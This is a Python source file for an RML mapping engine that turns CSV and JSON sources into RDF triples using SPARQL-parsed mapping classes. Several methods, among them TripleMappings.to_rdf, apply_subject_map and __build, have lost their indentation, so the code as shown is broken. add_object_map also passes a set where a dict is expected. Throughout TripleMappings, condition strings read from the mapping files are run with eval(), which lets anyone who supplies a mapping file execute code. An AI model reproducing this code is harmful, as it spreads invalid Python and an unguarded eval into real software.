    """Factory that selects the right Predicate flavour for a predicate-object map."""

    @staticmethod
    def build(g: Graph, parent: Union[URIRef, BNode]) -> Set[Predicate]:
        """Return one Predicate parsed from ``g`` for ``parent``, or None."""
        if (parent, rml_vocab.PREDICATE, None) in g:
            candidates = ConstantPredicate.from_rdf(g, parent)
        elif (parent, rml_vocab.PREDICATE_MAP, None) in g:
            candidates = PredicateMap.from_rdf(g, parent)
        else:
            return None
        # Empty or missing result set means no usable predicate.
        if not candidates:
            return None
        return candidates.pop()
class PredicateObjectMap(AbstractMap):
    """Couples a Predicate with an ObjectMap and produces (predicate, object)
    pairs for the rows of a logical source."""

    def __init__(self, predicate: Predicate, object_map: ObjectMap, map_id: URIRef = None):
        super().__init__(map_id, predicate)
        self._predicate = predicate
        self.__object_map = object_map

    def get_predicate(self) -> Predicate:
        return self._predicate

    def get_object_map(self) -> ObjectMap:
        return self.__object_map

    def to_rdf(self) -> Graph:
        """Serialise this map, its predicate and its object map."""
        g = Graph('IOMemory')
        g.add((self._id, RDF.type, rml_vocab.PREDICATE_OBJECT_MAP_CLASS))
        g = graph_add_all(g, self._predicate.to_rdf())
        g.add((self._id, rml_vocab.OBJECT_MAP, self.__object_map.get_id()))
        g = graph_add_all(g, self.__object_map.to_rdf())
        return g

    def apply(self, df: DataFrame):
        """Column-wise generation of (predicate, object) pairs for ``df``.

        Returns None when pandas fails to combine the two series (best-effort,
        as in the original implementation).
        """
        start_time = time.time()
        df_1 = self.__object_map.apply(df)
        predicate = self.get_mapped_entity()
        if isinstance(predicate, ConstantPredicate):
            try:
                df_1 = df_1.apply(lambda x: (predicate.apply(df), x))
            except Exception:
                return None
        elif isinstance(predicate, PredicateMap):
            try:
                df_1 = pd.concat([predicate.apply(df), df_1], axis=1, sort=False)
                df_1 = df_1[[0, 1]].apply(tuple, axis=1)
            except Exception:
                return None
        elapsed_time_secs = time.time() - start_time
        msg = "\t Predicate Object Map: %s secs" % elapsed_time_secs
        print(msg)
        return df_1

    def apply_(self, row):
        """Row-wise generation: a (predicate, object) pair, or None when either
        term could not be produced."""
        obj = self.__object_map.apply_(row)
        predicate = self.get_mapped_entity().apply_(row)
        # BUG FIX: the original tested the builtin ``object`` (always truthy)
        # instead of the computed ``obj``, so pairs with a missing object were
        # emitted whenever the predicate resolved.
        if obj is not None and predicate is not None:
            return (predicate, obj)
        else:
            return None

    @staticmethod
    def from_rdf(g: Graph, parent: Union[BNode, URIRef] = None) -> Set[TermMap]:
        """Collect predicate-object maps from ``g``; URIRef-identified maps are
        cached in the converter's shared mapping dict."""
        term_maps = set()
        query = prepareQuery(
            """
                SELECT DISTINCT ?pom ?predicate ?om
                WHERE {
                    ?pom rr:objectMap ?om
                }""",
            initNs = { "rr": rml_vocab.RR})

        if parent is not None:
            qres = g.query(query, initBindings = { "pom": parent})
        else:
            qres = g.query(query)

        mapping_dict = RMLConverter.get_instance().get_mapping_dict()
        for row in qres:
            pom = None
            if isinstance(row.pom, URIRef):
                if row.pom in mapping_dict:
                    pom = mapping_dict.get(row.pom)
                else:
                    pom = PredicateObjectMap.__build(g, row)
                    mapping_dict.add(pom)
            else:
                pom = PredicateObjectMap.__build(g, row)
            term_maps.add(pom)
        return term_maps

    @staticmethod
    def __build(g, row):
        """Assemble one PredicateObjectMap from a query result row."""
        mapping_dict = RMLConverter.get_instance().get_mapping_dict()
        predicate = PredicateBuilder.build(g, row.pom)
        object_map = None
        if isinstance(row.om, URIRef):
            if row.om in mapping_dict:
                object_map = mapping_dict.get(row.om)
            else:
                object_map = ObjectMapBuilder.build(g, row.om)
                mapping_dict.add(object_map)
        else:
            object_map = ObjectMapBuilder.build(g, row.om)

        if predicate is not None and object_map is not None:
            return PredicateObjectMap(predicate, object_map, row.pom)
        else:
            return None
class ObjectMapBuilder():
    """Factory that chooses the ObjectMap flavour for a given map node:
    referencing object maps (rr:parentTriplesMap) or plain term object maps."""

    @staticmethod
    def build(g: Graph, parent: Union[URIRef, BNode]) -> Set[ObjectMap]:
        """Return one ObjectMap parsed from ``g`` for ``parent``, or None."""
        if (parent, rml_vocab.PARENT_TRIPLES_MAP, None) in g:
            candidates = ReferencingObjectMap.from_rdf(g, parent)
        else:
            candidates = TermObjectMap.from_rdf(g, parent)
        return candidates.pop() if candidates else None
class Join(AbstractMap):
    """rr:Join condition holding the child/parent column pair of a join."""

    def __init__(self, child: Literal, parent: Literal, map_id: URIRef = None):
        super().__init__(map_id)
        self.__child = child
        self.__parent = parent

    def get_child(self) -> str:
        return self.__child

    def get_parent(self) -> str:
        return self.__parent

    def to_rdf(self) -> Graph:
        """Serialise the rr:child / rr:parent pair (only when both are set)."""
        out = Graph('IOMemory')
        if self.__child is not None and self.__parent is not None:
            out.add((self._id, rml_vocab.CHILD, self.__child))
            out.add((self._id, rml_vocab.PARENT, self.__parent))
        return out

    @staticmethod
    def from_rdf(g: Graph, parent: Union[BNode, URIRef] = None) -> Set[TermMap]:
        """Collect join conditions from ``g``, optionally scoped to ``parent``."""
        term_maps = set()
        query = prepareQuery(
            """
                SELECT DISTINCT ?join ?child ?parent
                WHERE {
                    ?p rr:child ?child ;
                        rr:parent ?parent
                }""",
            initNs = { "rr": rml_vocab.RR})

        if parent is not None:
            qres = g.query(query, initBindings = { "p": parent})
        else:
            qres = g.query(query)

        for row in qres:
            # NOTE(review): ?join is selected but never bound in the WHERE
            # clause, so row.join is presumably always None and the URIRef
            # branch below looks unreachable — confirm against the mappings.
            if isinstance(row.join, URIRef):
                condition = Join(row.child, row.parent, row.join)
            else:
                condition = Join(child=row.child, parent=row.parent)
            term_maps.add(condition)
        return term_maps
class InputFormatNotSupportedError(Exception):
    """Raised when a logical source declares a reference formulation that
    this converter cannot process.

    :param format: the unsupported reference formulation (e.g. an IRI).
    """

    def __init__(self, format):
        self.message = "The format %s is currently not supported" % (format)
        # BUG FIX: pass the message to Exception.__init__ so that str(e) and
        # tracebacks show it (previously str(e) was empty).
        super().__init__(self.message)
class LogicalSource(AbstractMap):
    """rml:LogicalSource — a data file (CSV or JSON via JSONPath) that feeds a
    triples map, loaded into a pandas DataFrame and cached per source URI."""

    def __init__(self, source: Literal, separator: str = None, map_id: URIRef = None, reference_formulation: URIRef = None, iterator: Literal = None):
        super().__init__(map_id, source)
        self.__separator = separator
        # CSV is the default reference formulation when none is declared.
        if reference_formulation is None:
            self.__reference_formulation = rml_vocab.CSV
        else:
            self.__reference_formulation = reference_formulation
        self.__iterator = iterator

    def get_source(self) -> Literal:
        return self.get_mapped_entity()

    def get_reference_formulation(self) -> URIRef:
        return self.__reference_formulation

    def get_separator(self) -> str:
        return self.__separator

    def to_rdf(self):
        """Serialise source, reference formulation, iterator and separator."""
        g = Graph('IOMemory')
        g.add((self._id, RDF.type, rml_vocab.BASE_SOURCE))
        g.add((self._id, rml_vocab.SOURCE, self.get_source()))
        g.add((self._id, rml_vocab.REFERENCE_FORMULATION, self.__reference_formulation))
        if self.__iterator is not None:
            g.add((self._id, rml_vocab.ITERATOR, self.__iterator))
        if self.__separator is not None:
            g.add((self._id, rml_vocab.SEPARATOR, self.__separator))
        return g

    def apply(self):
        """Load the source into a DataFrame, reusing the converter-wide cache.

        :raises InputFormatNotSupportedError: for unknown reference formulations.
        """
        loaded_logical_sources = RMLConverter.get_instance().get_loaded_logical_sources()

        # BUG FIX: logical_source_uri was previously assigned only inside the
        # cache-lookup branch, so the cache update at the bottom raised
        # NameError whenever self._mapped_entity was falsy.
        logical_source_uri = self._mapped_entity.value if self._mapped_entity else None
        if logical_source_uri is not None and logical_source_uri in loaded_logical_sources:
            return loaded_logical_sources[logical_source_uri]

        sep = ',' if self.__separator is None else self.__separator

        if self.__reference_formulation == rml_vocab.JSON_PATH:
            # Select the iterated records with JSONPath, then flatten to rows.
            jsonpath_expr = parse(self.__iterator)
            with open(self._mapped_entity.value) as f:
                json_data = json.load(f)
            matches = jsonpath_expr.find(json_data)
            data = [match.value for match in matches]
            df = pd.json_normalize(data)
        elif self.__reference_formulation == rml_vocab.CSV:
            # dtype=str keeps all cells textual so term maps see raw values.
            df = pd.read_csv(self._mapped_entity.value, sep=sep, dtype=str)
        else:
            raise InputFormatNotSupportedError(self.__reference_formulation)

        if logical_source_uri is not None:
            loaded_logical_sources.update({logical_source_uri: df})
        return df

    @staticmethod
    def from_rdf(g: Graph, parent: Union[BNode, URIRef] = None) -> Set[TermMap]:
        """Collect logical sources from ``g``, optionally scoped to ``parent``."""
        term_maps = set()
        sparql = """
            SELECT DISTINCT ?ls ?source ?rf ?sep ?ite
            WHERE {
                ?p rml:logicalSource ?ls .
                ?ls rml:source ?source .
                OPTIONAL {?ls rml:referenceFormulation ?rf}
                OPTIONAL {?ls crml:separator ?sep}
                OPTIONAL {?ls rml:iterator ?ite}
            }"""

        query = prepareQuery(sparql,
                initNs = {
                    "rml": rml_vocab.RML,
                    "crml": rml_vocab.CRML
                    })

        if parent is not None:
            qres = g.query(query, initBindings = { "p": parent})
        else:
            qres = g.query(query)

        for row in qres:
            source = row.source
            ls = LogicalSource(source, row.sep, row.ls, row.rf, row.ite)
            term_maps.add(ls)
        return term_maps
class GraphMap(AbstractMap):
    """rr:graphMap — names the graph a triple is placed in, either as a
    template (Literal) or as a constant IRI."""

    def __init__(self, mapped_entity: Node, map_id: URIRef = None):
        super().__init__(map_id, mapped_entity)

    def to_rdf(self):
        """Serialise as rr:template (for literals) or rr:constant (for IRIs)."""
        out = Graph('IOMemory')
        if isinstance(self._mapped_entity, Literal):
            out.add((self._id, rml_vocab.TEMPLATE, self._mapped_entity))
        elif isinstance(self._mapped_entity, URIRef):
            out.add((self._id, rml_vocab.CONSTANT, self._mapped_entity))
        return out

    @staticmethod
    def from_rdf(g: Graph, parent: Union[BNode, URIRef] = None) -> Set[TermMap]:
        """Collect graph maps (rr:graphMap/rr:graph forms) from ``g``."""
        term_maps = set()
        mappings_dict = RMLConverter.get_instance().get_mapping_dict()
        sparql = """
            SELECT DISTINCT ?gm ?g
            WHERE {
                { ?p rr:graphMap ?gm .
                  ?gm rr:constant ?g }
                UNION
                { ?p rr:graph ?g }
                UNION
                { ?p rr:graphMap ?gm .
                  ?gm rr:template ?g }
            }"""
        query = prepareQuery(sparql,
                initNs = { "rr": rml_vocab.RR })

        if parent is not None:
            qres = g.query(query, initBindings = { "p": parent})
        else:
            qres = g.query(query)

        for row in qres:
            graph_map = None
            if row.gm is not None:
                if isinstance(row.gm, URIRef):
                    # URIRef-identified graph maps are shared via the cache.
                    if row.gm in mappings_dict:
                        graph_map = mappings_dict.get(row.gm)
                    else:
                        graph_map = GraphMap(row.g, row.gm)
                        mappings_dict.add(graph_map)
                else:
                    graph_map = GraphMap(row.g, row.gm)
            elif row.g is not None:
                graph_map = GraphMap(mapped_entity=row.g)
            term_maps.add(graph_map)
        return term_maps
class SubjectMap(AbstractMap):
    """rr:subjectMap — produces the subject IRI of every generated triple from
    a template, a constant or a column reference, with optional rr:class
    types and an optional graph map."""

    def __init__(self, mapped_entity: Node, term_type: Literal, class_: Set[URIRef] = None, graph_map: GraphMap = None, map_id: URIRef = None):
        super().__init__(map_id, mapped_entity)
        self.__class = class_
        self.__graph_map = graph_map
        # One of Literal("template") / Literal("constant") / Literal("reference"),
        # as bound by the SPARQL query in from_rdf.
        self.__term_type = term_type

    def get_class(self) -> URIRef:
        return self.__class

    def get_graph_map(self) -> GraphMap:
        return self.__graph_map

    def to_rdf(self):
        """Serialise the subject source, its classes and its graph map."""
        g = Graph('IOMemory')
        subject_map = self._id

        if self.__term_type == Literal("template"):
            g.add((subject_map, rml_vocab.TEMPLATE, self._mapped_entity))
        elif self.__term_type == Literal("constant"):
            g.add((subject_map, rml_vocab.CONSTANT, self._mapped_entity))
        elif self.__term_type == Literal("reference"):
            g.add((subject_map, rml_vocab.REFERENCE, self._mapped_entity))

        if self.__class is not None:
            for c in self.__class:
                # BUG FIX: the original added self.__class (the whole set) for
                # every iteration instead of the current class c.
                if c is not None:
                    g.add((subject_map, rml_vocab.CLASS, c))

        if self.__graph_map is not None:
            graph_map_g = self.__graph_map.to_rdf()
            g.add((subject_map, rml_vocab.GRAPH_MAP, self.__graph_map.get_id()))
            g = graph_add_all(g, graph_map_g)
        return g

    def __convert(self, row):
        """Build the subject IRI for one row."""
        term = None
        if self.__term_type == Literal("template") or self.__term_type == Literal("constant"):
            term = TermUtils.urify(self._mapped_entity, row)
        elif self.__term_type == Literal("reference"):
            term = URIRef(row[self._mapped_entity.value])
        return term

    def apply(self, df: DataFrame):
        """Column-wise subject generation; empty results are dropped."""
        start_time = time.time()
        l = lambda x: self.__convert(x)
        df_1 = df.apply(l, axis=1)
        df_1.replace('', np.nan, inplace=True)
        df_1.dropna(inplace=True)
        elapsed_time_secs = time.time() - start_time
        msg = "Subject Map: %s secs" % elapsed_time_secs
        print(msg)
        return df_1

    def apply_(self, row):
        """Row-wise subject generation (uses the precompiled expression)."""
        term = None
        if self.__term_type == Literal("template") or self.__term_type == Literal("constant"):
            term = self._expression.eval(row, True)
        elif self.__term_type == Literal("reference"):
            term = URIRef(row[self._mapped_entity.value])
        return term

    @staticmethod
    def from_rdf(g: Graph, parent: Union[BNode, URIRef] = None) -> Set[TermMap]:
        """Collect subject maps from ``g``, merging multiple rr:class rows for
        the same subject map into one set of classes."""
        mappings_dict = RMLConverter.get_instance().get_mapping_dict()
        sparql = """
            SELECT DISTINCT ?sm ?map ?termType ?type ?gm ?g
            WHERE {
                ?p rr:subjectMap ?sm .
                { ?sm rr:template ?map
                  BIND("template" AS ?termType)
                }
                UNION
                { ?sm rr:constant ?map
                  BIND("constant" AS ?termType)
                }
                UNION
                { ?sm rml:reference ?map
                  BIND("reference" AS ?termType)
                }
                OPTIONAL {?sm rr:class ?type}
                OPTIONAL {
                    { ?sm rr:graphMap ?gm }
                    UNION
                    { ?sm rr:graph ?g }
                }
            }"""
        query = prepareQuery(sparql,
                initNs = { "rr": rml_vocab.RR, "rml": rml_vocab.RML})

        if parent is not None:
            qres = g.query(query, initBindings = { "p": parent})
        else:
            qres = g.query(query)

        subject_maps = {}
        for row in qres:
            subject_map = None
            if isinstance(row.sm, URIRef) and row.sm in mappings_dict:
                subject_map = mappings_dict.get(row.sm)

            if subject_map is None:
                if row.sm.n3() in subject_maps:
                    subject_map = subject_maps[row.sm.n3()]
                    # Guard against the unbound OPTIONAL: row.type may be None.
                    if row.type is not None:
                        subject_map.__class.add(row.type)
                else:
                    subject_map = SubjectMap.__create(g, row)
                    subject_maps.update({row.sm.n3(): subject_map})
                    if isinstance(row.sm, URIRef):
                        mappings_dict.add(subject_map)
            else:
                if row.type is not None:
                    subject_map.__class.add(row.type)

        return set(subject_maps.values())

    @staticmethod
    def __create(g, row):
        """Build one SubjectMap (and its graph map, if any) from a result row."""
        graph_map = None
        if row.gm is not None or row.g is not None:
            # BUG FIX: the original passed row.g (an RDF node) where the query
            # Graph is expected by GraphMap.from_rdf.
            gm_candidates = GraphMap.from_rdf(g, row.sm)
            if gm_candidates:
                graph_map = gm_candidates.pop()

        classes = {row.type} if row.type is not None else set()
        return SubjectMap(row.map, row.termType, classes, graph_map, row.sm)
class TripleMappings(AbstractMap):
    """rr:TriplesMap — ties together a logical source, a subject map and the
    predicate-object maps that generate the triples, plus an optional
    crml:condition (a pandas boolean expression eval'ed against the source)."""

    def __init__(self,
                 logical_source: LogicalSource,
                 subject_map: SubjectMap,
                 predicate_object_maps: Dict[Identifier, ObjectMap] = None,
                 iri: URIRef = None,
                 condition: str = None):
        super().__init__(iri, logical_source.get_id())
        self.__logical_source = logical_source
        self.__subject_map = subject_map
        # Keyed by the predicate-object map's identifier; may be None.
        self.__predicate_object_maps = predicate_object_maps
        self.__condition = condition
    def get_logical_source(self) -> LogicalSource:
        """The data source feeding this triples map."""
        return self.__logical_source

    def get_subject_map(self) -> SubjectMap:
        """The subject map producing the subject of every triple."""
        return self.__subject_map

    def get_predicate_object_maps(self) -> Dict[Identifier, ObjectMap]:
        """Mapping from map identifier to predicate-object map (or None)."""
        return self.__predicate_object_maps

    def set_predicate_object_maps(self, poms: Dict[Identifier, ObjectMap]):
        """Replace the predicate-object maps wholesale."""
        self.__predicate_object_maps = poms

    def get_condition(self):
        """The crml:condition string (eval'ed as a pandas filter), or None."""
        return self.__condition
def add_object_map(self, object_map: ObjectMap):
if self.__predicate_object_maps is None:
self.__predicate_object_maps = dict()
self.__predicate_object_maps.update({object_map.get_id(), object_map})
    def get_object_map(self, identifier: Union[URIRef, BNode]) -> ObjectMap:
        """Look up a registered predicate-object map by its identifier."""
        return self.__predicate_object_maps.get(identifier)
def to_rdf(self) -> Graph:
g = Graph('IOMemory')
g.add((self._id, RDF.type, rml_vocab.TRIPLES_MAP))
g.add((self._id, rml_vocab.LOGICAL_SOURCE, self.__logical_source.get_id()))
g.add((self._id, rml_vocab.SUBJECT_MAP, self.__subject_map.get_id()))
if self.__condition is not None:
g.add((self._id, rml_vocab.CONDITION, self.__condition))
g = graph_add_all(g, self.__logical_source.to_rdf())
g = graph_add_all(g, self.__subject_map.to_rdf())
#g += self.__logical_source.to_rdf()
#g += self.__subject_map.to_rdf()
for key, value in self.__predicate_object_maps.items():
g.add((self._id, rml_vocab.PREDICATE_OBJECT_MAP, key))
g = graph_add_all(g, value.to_rdf())
#g += value.to_rdf()
return g
    @staticmethod
    def __triplify_series(entry, entity_types : Set[URIRef], graph : Graph):
        """Best-effort: add the (subject, predicate, object) triple encoded in
        a merged row ('0_l' holds the subject, '0_r' the (p, o) pair), plus
        rdf:type triples. Malformed rows are silently skipped by design."""
        try:
            graph.add((entry['0_l'], entry['0_r'][0], entry['0_r'][1]))
            if entity_types:
                TripleMappings.__add_types(entry['0_l'], entity_types, graph)
            return graph
        except:
            # Deliberate swallow: a bad term must not abort the whole mapping.
            pass
    @staticmethod
    def __add_types(entry, entity_types : Set[URIRef], graph : Graph):
        """Best-effort: add one rdf:type triple per entity type for ``entry``.
        Malformed terms are silently skipped by design."""
        try:
            for entity_type in entity_types:
                graph.add((entry, RDF.type, entity_type))
            return graph
        except:
            # Deliberate swallow: a bad term must not abort the whole mapping.
            pass
    def apply(self):
        """Legacy column-wise materialisation of this triples map into a Graph.

        Loads the source, optionally filters it with the eval'ed condition
        (condition strings may reference the local name ``df``), generates
        subjects and (predicate, object) pairs, and assembles triples.
        NOTE(review): the subject df.apply below lacks axis=1, unlike
        apply_subject_map/apply_ — presumably a latent bug in this legacy
        path; confirm before relying on it.
        """
        start_time = time.time()
        g = Graph('IOMemory')
        df = self.__logical_source.apply()

        if self.__condition is not None and self.__condition.strip() != '':
            df = df[eval(self.__condition)]

        #sbj_representation = self.__subject_map.apply(df)
        start_time = time.time()
        sbj_representation = df.apply(self.__subject_map.apply_)
        elapsed_time_secs = time.time() - start_time
        msg = "Subject Map: %s secs" % elapsed_time_secs
        print(msg)
        if sbj_representation is not None and not sbj_representation.empty:
            if self.__predicate_object_maps is not None:
                #triplification = lambda x: TripleMappings.__triplify_series(x, self.__subject_map.get_class(), g)
                for pom in self.__predicate_object_maps.values():
                    pom_representation = pom.apply(df)
                    if pom_representation is not None and not pom_representation.empty:
                        if isinstance(sbj_representation, pd.Series):
                            sbj_representation=sbj_representation.to_frame().reset_index()
                        try:
                            object_map = pom.get_object_map()
                            # Join-based object maps are aligned by row index.
                            if isinstance(object_map, ReferencingObjectMap) and object_map.get_join_conditions():
                                pom_representation=pom_representation.to_frame().reset_index()
                                results = sbj_representation.merge(pom_representation, how='left', suffixes=("_l", "_r"), left_on="index", right_on="index", sort=False)
                                '''
                                for k,v in results.iterrows():
                                    try:
                                        g.add((v['0_l'], v['0_r'][0], v['0_r'][1]))
                                        if self.__subject_map.get_class() is not None:
                                            for type in self.__subject_map.get_class():
                                                g.add((v['0_l'], RDF.type, type))
                                    except:
                                        pass
                                '''
                            else:
                                '''
                                if isinstance(sbj_representation, DataFrame):
                                    results = pd.concat([sbj_representation[0], pom_representation], axis=1, sort=False)
                                else:
                                    results = pd.concat([sbj_representation, pom_representation], axis=1, sort=False)
                                #print("---")
                                #print(pom_representation)
                                results.columns = ['0_l', '0_r']
                                #print(results)
                                '''
                                results = pd.concat([sbj_representation[0], pom_representation], axis=1, sort=False)
                                results.columns = ['0_l', '0_r']
                                '''
                                if isinstance(sbj_representation, DataFrame):
                                    subjs = sbj_representation[0].values
                                    #results = pd.concat([sbj_representation[0], pom_representation], axis=1, sort=False)
                                else:
                                    subjs = sbj_representation.values
                                    print(sbj_representation.to_frame().reset_index())
                                    #results = pd.concat([sbj_representation, pom_representation], axis=1, sort=False)
                                poms = pom_representation.values
                                #df_1 = df_1[[0, 1]].apply(tuple, axis=1)
                                for subj, p_o in zip(subjs, poms):
                                    try:
                                        g.add((subj, p_o[0], p_o[1]))
                                        if self.__subject_map.get_class() is not None:
                                            for type in self.__subject_map.get_class():
                                                g.add((subj, RDF.type, type))
                                    except:
                                        pass
                                '''
                                #results.columns = ['0_l', '0_r']
                        except Exception as e:
                            raise e
                        # Collapse each merged row into a (s, p, o) tuple.
                        results = results[['0_l', '0_r']].apply(lambda x: (x['0_l'], x['0_r'][0], x['0_r'][1]), axis=1)
                        for triple in results.values:
                            try:
                                #g.add((v['0_l'], v['0_r'][0], v['0_r'][1]))
                                g.add(triple)
                                if self.__subject_map.get_class() is not None:
                                    for type in self.__subject_map.get_class():
                                        g.add((triple[0], RDF.type, type))
                            except:
                                # Best-effort: skip rows that produce bad terms.
                                pass
            elif self.__subject_map.get_class() is not None:
                #triplification = lambda x: TripleMappings.__add_types(x, self.__subject_map.get_class(), g)
                #sbj_representation.apply(triplification)
                for k,v in sbj_representation.iteritems():
                    try:
                        g.add((v, RDF.type, self.__subject_map.get_class()))
                    except:
                        pass
        elapsed_time_secs = time.time() - start_time
        msg = "\t Triples Mapping %s: %s secs" % (self._id, elapsed_time_secs)
        print(msg)
        return g
def apply_subject_map(self):
start_time = time.time()
g = Graph('IOMemory')
df = self.__logical_source.apply()
if self.__condition is not None and self.__condition.strip() != '':
df = df[eval(self.__condition)]
#sbj_representation = self.__subject_map.apply(df)
sbj_representation = df.apply(self.__subject_map.apply_, axis=1)
elapsed_time_secs = time.time() - start_time
msg = "Subject Map: %s secs" % elapsed_time_secs
print(msg)
return sbj_representation
    def apply_(self):
        """Row-wise materialisation of this triples map into a Graph.

        Loads and optionally filters the source (condition strings are
        eval'ed and may reference the local frame names), generates subject
        terms, then for each predicate-object map either performs the
        rr:joinCondition merge against the parent triples map's source or
        applies the map row by row, finally assembling (s, p, o) triples
        plus rdf:type triples for the subject classes.
        """
        start_time = time.time()
        msg = "\t TripleMapping %s" % self._id
        print(msg)
        g = Graph('IOMemory')
        df = self.__logical_source.apply()

        if self.__condition is not None and self.__condition.strip() != '':
            df = df[eval(self.__condition)]

        #sbj_representation = self.__subject_map.apply(df)
        sbj_representation = df.apply(self.__subject_map.apply_, axis=1)
        elapsed_time_secs = time.time() - start_time
        #msg = "Subject Map: %s secs" % elapsed_time_secs
        #print(msg)
        if sbj_representation is not None and not sbj_representation.empty:
            if self.__predicate_object_maps is not None:
                #triplification = lambda x: TripleMappings.__triplify_series(x, self.__subject_map.get_class(), g)
                for pom in self.__predicate_object_maps.values():
                    #pom_representation = pom.apply(df)
                    #if isinstance(sbj_representation, pd.Series):
                    #    sbj_representation=sbj_representation.to_frame().reset_index()
                    try:
                        object_map = pom.get_object_map()
                        if isinstance(object_map, ReferencingObjectMap) and object_map.get_join_conditions():
                            # Join path: merge child rows with the parent
                            # triples map's rows on the join columns.
                            df_left = df
                            df_left["__pyrml_sbj_representation__"] = sbj_representation
                            parent_triple_mappings = object_map.get_parent_triples_map()
                            df_right = parent_triple_mappings.get_logical_source().apply()
                            pandas_condition = parent_triple_mappings.get_condition()
                            if pandas_condition:
                                df_right = df_right[eval(pandas_condition)]
                            join_conditions = object_map.get_join_conditions()
                            left_ons = []
                            right_ons = []
                            for join_condition in join_conditions:
                                left_ons.append(join_condition.get_child().value)
                                right_ons.append(join_condition.get_parent().value)
                            df_join = df_left.merge(df_right, how='inner', suffixes=(None, "_r"), left_on=left_ons, right_on=right_ons, sort=False)
                            pom_representation = df_join.apply(pom.apply_, axis=1)
                            results = pd.concat([df_join["__pyrml_sbj_representation__"], pom_representation], axis=1, sort=False)
                            #print("ciccio")
                            #print(results)
                            results.columns = ['0_l', '0_r']
                        else:
                            pom_representation = None
                            if isinstance(object_map, ReferencingObjectMap):
                                # No join: still honour the parent map's filter.
                                pandas_condition = object_map.get_parent_triples_map().get_condition()
                                if pandas_condition:
                                    df_pom = df[eval(pandas_condition)]
                                    pom_representation = df_pom.apply(pom.apply_, axis=1)
                            if pom_representation is None:
                                pom_representation = df.apply(pom.apply_, axis=1)
                            if pom_representation is not None and not pom_representation.empty:
                                results = pd.concat([sbj_representation, pom_representation], axis=1, sort=False)
                                results.columns = ['0_l', '0_r']
                    except Exception as e:
                        raise e
                    # We remove NaN values so that we can generate valid RDF triples.
                    results.dropna(inplace=True)
                    results = results[['0_l', '0_r']].apply(lambda x: (x['0_l'], x['0_r'][0], x['0_r'][1]), axis=1)
                    for triple in results.values:
                        try:
                            g.add(triple)
                            _classes = self.__subject_map.get_class()
                            if _classes:
                                for _class in _classes:
                                    if _class:
                                        g.add((triple[0], RDF.type, _class))
                        except:
                            # Best-effort: bad terms are skipped; the print
                            # below is leftover debugging for one mapping.
                            if self._id == URIRef('https://dati.isprambiente.it/ld/rml/sensors_map.ttl#SensorModelData'):
                                print(triple)
                            pass
            elif self.__subject_map.get_class() is not None:
                #triplification = lambda x: TripleMappings.__add_types(x, self.__subject_map.get_class(), g)
                #sbj_representation.apply(triplification)
                for k,v in sbj_representation.iteritems():
                    try:
                        _classes = self.__subject_map.get_class()
                        if _classes:
                            for _class in _classes:
                                if _class:
                                    g.add((v, RDF.type, _class))
                    except:
                        pass
        elapsed_time_secs = time.time() - start_time
        #msg = "\t Triples Mapping %s: %s secs" % (self._id, elapsed_time_secs)
        msg = "\t\t done in %s secs" % (elapsed_time_secs)
        print(msg)
        return g
    @staticmethod
    def from_rdf(g: Graph, parent: Union[BNode, URIRef] = None) -> Set[TermMap]:
        """Extract the TripleMappings declared in graph ``g``.

        parent: when given, only triples maps referenced from that node via
            rr:parentTriplesMap are collected.

        Uses the process-wide mapping cache so a triples map seen twice only
        gets its newly discovered predicate-object maps merged in instead of
        being rebuilt.
        """
        term_maps = set()
        sparql = """
            SELECT DISTINCT ?tm ?source ?sm ?pom ?cond
            WHERE {
                %PLACE_HOLDER%
                ?tm rml:logicalSource ?source ;
                    rr:subjectMap ?sm
                OPTIONAL {?tm rr:predicateObjectMap ?pom}
                OPTIONAL {?tm crml:condition ?cond}
            }"""
        # The placeholder restricts the query to children of ``parent`` (if any).
        if parent is not None:
            sparql = sparql.replace("%PLACE_HOLDER%", "?p rr:parentTriplesMap ?tm . ")
        else:
            sparql = sparql.replace("%PLACE_HOLDER%", "")
        query = prepareQuery(sparql,
                initNs = {
                    "rr": rml_vocab.RR,
                    "rml": rml_vocab.RML,
                    "crml": rml_vocab.CRML})
        if parent is not None:
            qres = g.query(query, initBindings = { "p": parent})
        else:
            qres = g.query(query)
        mappings_dict = RMLConverter.get_instance().get_mapping_dict()
        for row in qres:
            tm = None
            if isinstance(row.tm, URIRef):
                if row.tm in mappings_dict:
                    tm = mappings_dict.get(row.tm)
                    if tm is not None:
                        # Cached mapping: merge only the (possibly new)
                        # predicate-object map discovered by this row.
                        pom = TripleMappings.__build_predicate_object_map(g, row)
                        poms = tm.get_predicate_object_maps()
                        if pom is not None and poms is None:
                            tm.set_predicate_object_maps({ pom.get_id(): pom })
                        elif pom is not None and pom.get_id() not in poms:
                            poms.update({ pom.get_id(): pom })
                else:
                    tm = TripleMappings.__build(g, row)
                    mappings_dict.add(tm)
            else:
                # Blank-node identified maps are not cacheable; always rebuild.
                tm = TripleMappings.__build(g, row)
                mappings_dict.add(tm)
            if tm is not None:
                term_maps.add(tm)
        return term_maps
@staticmethod
def __build(g, row):
mappings_dict = RMLConverter.get_instance().get_mapping_dict()
source = None
if row.source is not None:
if isinstance(row.source, URIRef) and row.source in mappings_dict:
source = mappings_dict.get(row.source)
else:
source = LogicalSource.from_rdf(g, row.tm).pop()
mappings_dict.add(source)
subject_map = None
if row.sm is not None:
if isinstance(row.sm, URIRef):
if row.sm in mappings_dict:
subject_map = mappings_dict.get(row.sm)
else:
subject_map = SubjectMap.from_rdf(g, row.tm).pop()
mappings_dict.add(subject_map)
else:
subject_map = SubjectMap.from_rdf(g, row.tm).pop()
predicate_object_map = TripleMappings.__build_predicate_object_map(g, row)
if predicate_object_map is not None:
pom_dict = { predicate_object_map.get_id(): predicate_object_map }
else:
pom_dict = None
return TripleMappings(source, subject_map, pom_dict, row.tm, row.cond)
@staticmethod
def __build_predicate_object_map(g, row):
mappings_dict = RMLConverter.get_instance().get_mapping_dict()
predicate_object_map = None
if row.pom is not None:
if isinstance(row.pom, URIRef):
if row.pom in mappings_dict:
predicate_object_map = mappings_dict.get(row.pom)
else:
predicate_object_map = PredicateObjectMap.from_rdf(g, row.pom).pop()
mappings_dict.add(predicate_object_map)
else:
pom = PredicateObjectMap.from_rdf(g, row.pom)
if len(pom) > 0:
predicate_object_map = pom.pop()
return predicate_object_map
class ReferencingObjectMap(ObjectMap):
    """Object map whose values are the subjects produced by another triples
    map (rr:parentTriplesMap), optionally constrained by rr:joinCondition."""

    def __init__(self, parent_triples_map: TripleMappings, joins: List[Join] = None, map_id: URIRef = None):
        super().__init__(map_id, parent_triples_map.get_id())
        self.__parent_triples_map = parent_triples_map
        self.__joins = joins

    def get_parent_triples_map(self) -> TripleMappings:
        return self.__parent_triples_map

